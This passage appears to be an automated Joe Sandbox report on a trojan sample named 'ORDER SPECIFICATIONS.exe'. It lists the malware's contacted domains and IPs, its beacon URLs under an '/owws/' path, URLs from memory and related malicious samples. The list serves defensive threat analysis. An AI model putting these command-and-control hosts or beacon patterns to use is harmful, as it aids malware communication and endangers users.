            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.krF0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.tiro.comxR0%Avira URL Cloudsafe
            http://www.fonts.come0%Avira URL Cloudsafe
            http://www.denisekohli.com/owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src0%Avira URL Cloudsafe
            https://www.casar.com/assunto/casamentos/casamentos-reais/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            https://www.casar.com/assunto/cha-de-panela/0%Avira URL Cloudsafe
            http://www.tiro.comtn0%Avira URL Cloudsafe
            http://www.fonts.comX0%Avira URL Cloudsafe
            http://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src0%Avira URL Cloudsafe
            https://www.casar.com/assunto/noivas/vestidos-de-noiva/0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.comoitu0%URL Reputationsafe
            http://www.fontbureau.comoitu0%URL Reputationsafe
            http://www.fontbureau.comoitu0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/ico0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.sajatypeworks.coma-d0%Avira URL Cloudsafe
            http://www.hostsnc.com/owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src0%Avira URL Cloudsafe
            http://www.fontbureau.comon0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            abaplants.com
            		50.87.196.120
            		truetrue
              		unknown
              www.hostsnc.com
              		156.240.32.114
              		truetrue
                		unknown
                www.athomecp.com
                		154.91.61.105
                		truetrue
                  		unknown
                  www.your-new-body-plan.com
                  		34.90.54.238
                  		truetrue
                    		unknown
                    denisekohli.com
                    		34.102.136.180
                    		truetrue
                      		unknown
                      softwaresreports.info
                      		34.102.136.180
                      		truetrue
                        		unknown
                        104.233.225.185.cname-url.com
                        		170.106.171.56
                        		truetrue
                          		unknown
                          assemble-4u.com
                          		13.57.130.120
                          		truetrue
                            		unknown
                            shops.myshopify.com
                            		23.227.38.74
                            		truefalse
                              		unknown
                              www.raphaelyejesiel.com
                              		54.85.86.211
                              		truetrue
                                		unknown
                                www.softwaresreports.info
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.gdzas08.cloud
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.cyjulebu.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.shamansmoke.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.abaplants.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.denisekohli.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.assemble-4u.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              www.athomecp.com/owws/true
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.denisekohli.com/owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hostsnc.com/owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0srctrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.fontbureau.com/designersGORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/?ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/MicrORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.comaYnORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cn/bTheORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/dnORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.microsoft.nhORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.casar.com/assunto/organizacao/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.tiro.comBRORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.casar.com/assunto/casamentos/decoracao-de-casamento/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tiro.comexplorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                      		high
                                                      https://www.casar.com/assunto/lua-de-mel-2/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://en.wXORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.goodfont.co.krORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.typography.netDORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cn/cTheORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.casar.comchkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://fontfabrik.comORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://embed.typeform.com/embed.jschkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://connect.facebook.net/en_US/fbevents.jschkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://casarpontocom.zendesk.com/hc/pt-brchkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://www.casar.com/assunto/noivas/dicas-para-noivas/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/DPleaseORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fonts.comORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sandoll.co.krFORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleaseORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.pinterest.com/casarpontocomchkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.sakkal.comORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.tiro.comxRORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.comORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fonts.comeORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.casar.com/assunto/casamentos/casamentos-reais/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.youtube.com/casarpontocomchkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.jiyu-kobo.co.jp/jp/ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.casar.com/assunto/cha-de-panela/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.tiro.comtnORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jschkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jschkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.fonts.comXORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.casar.com/assunto/noivas/vestidos-de-noiva/chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.carterandcone.comlORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.founder.com.cn/cn/ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.fontbureau.com/designers/cabarga.htmlNORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cnORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.fontbureau.com/designers/frere-jones.htmlORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.comoituORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.jiyu-kobo.co.jp/icoORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.jiyu-kobo.co.jp/ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.sajatypeworks.coma-dORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers8ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.comonORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://instagram.com/casarpontocomchkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                                      		high

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      170.106.171.56
                                                                                      		unknownSingapore
                                                                                      		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                      34.90.54.238
                                                                                      		unknownUnited States
                                                                                      		15169GOOGLEUStrue
                                                                                      50.87.196.120
                                                                                      		unknownUnited States
                                                                                      		46606UNIFIEDLAYER-AS-1UStrue
                                                                                      54.85.86.211
                                                                                      		unknownUnited States
                                                                                      		14618AMAZON-AESUStrue
                                                                                      34.102.136.180
                                                                                      		unknownUnited States
                                                                                      		15169GOOGLEUStrue
                                                                                      156.240.32.114
                                                                                      		unknownSeychelles
                                                                                      		328608Africa-on-Cloud-ASZAtrue
                                                                                      13.57.130.120
                                                                                      		unknownUnited States
                                                                                      		16509AMAZON-02UStrue
                                                                                      154.91.61.105
                                                                                      		unknownSeychelles
                                                                                      		62468VPSQUANUStrue

                                                                                      General Information

                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                      Analysis ID:356492
                                                                                      Start date:23.02.2021
                                                                                      Start time:08:55:55
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 12m 41s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:light
                                                                                      Sample file name:ORDER SPECIFICATIONS.exe
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:28
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.evad.winEXE@12/4@12/8
                                                                                      EGA Information:Failed
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 10.8% (good quality ratio 9.4%)
                                                                                      • Quality average: 71.2%
                                                                                      • Quality standard deviation: 33.6%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 98%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      • Found application associated with file extension: .exe
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                      • TCP Packets have been reduced to 100
                                                                                      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.103.5.186, 204.79.197.200, 13.107.21.200, 93.184.220.29, 51.104.139.180, 168.61.161.212, 92.122.145.220, 13.64.90.137, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 8.253.95.121, 8.248.145.254, 67.26.83.254, 67.27.157.126, 8.248.123.254, 20.54.26.129
                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      08:56:54API Interceptor1x Sleep call for process: ORDER SPECIFICATIONS.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      54.85.86.211JwekqCZAwt.exeGet hashmaliciousBrowse
                                                                                      • www.anaejoao2021.com/d8h/?YvFH=wR-xA2rHgBVhIve&KXRxqv=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+ne7AOeWmMaD
                                                                                      request.exeGet hashmaliciousBrowse
                                                                                      • www.anaejoao2021.com/d8h/?1bS=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+neRf+uWiOSD&DXaDp=fRmTtjUX8ZQHeF6
                                                                                      PO#646756575646.exeGet hashmaliciousBrowse
                                                                                      • www.anaejoao2021.com/d8h/?EhLT5l=9rhdJxHx-Bl&YL0=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+k+rPvOu4pzE
                                                                                      PO8479349743085.exeGet hashmaliciousBrowse
                                                                                      • www.anaejoao2021.com/d8h/?-Z1hir=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+kySDOiuvvvVPuj7Qw==&2dz=onrhc
                                                                                      34.102.136.180NewOrder.xlsmGet hashmaliciousBrowse
                                                                                      • www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
                                                                                      Order_20180218001.exeGet hashmaliciousBrowse
                                                                                      • www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
                                                                                      22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                      • www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
                                                                                      ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                      • www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0
                                                                                      PO_210222.exeGet hashmaliciousBrowse
                                                                                      • www.kspindustries.com/dka/?9rYD4D2P=9WUKE20VMOTsgTPOGG+gM7wMKgTDQQYKjBu36Jx5uNlLi85Jvnz4VQqFTS3DYsDMhKcM&4h=vTxdADNprBU8ur
                                                                                      Order83930.exeGet hashmaliciousBrowse
                                                                                      • www.worksmade.com/pkfa/?kRm0q=AeLHm4krJ5cZleWXJ7DbkRDB3iMf+mbqkQIEvPdjRXBov8eOMTfw1ykaYqt0P2yYW1wd&P0D=AdpLplk
                                                                                      DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
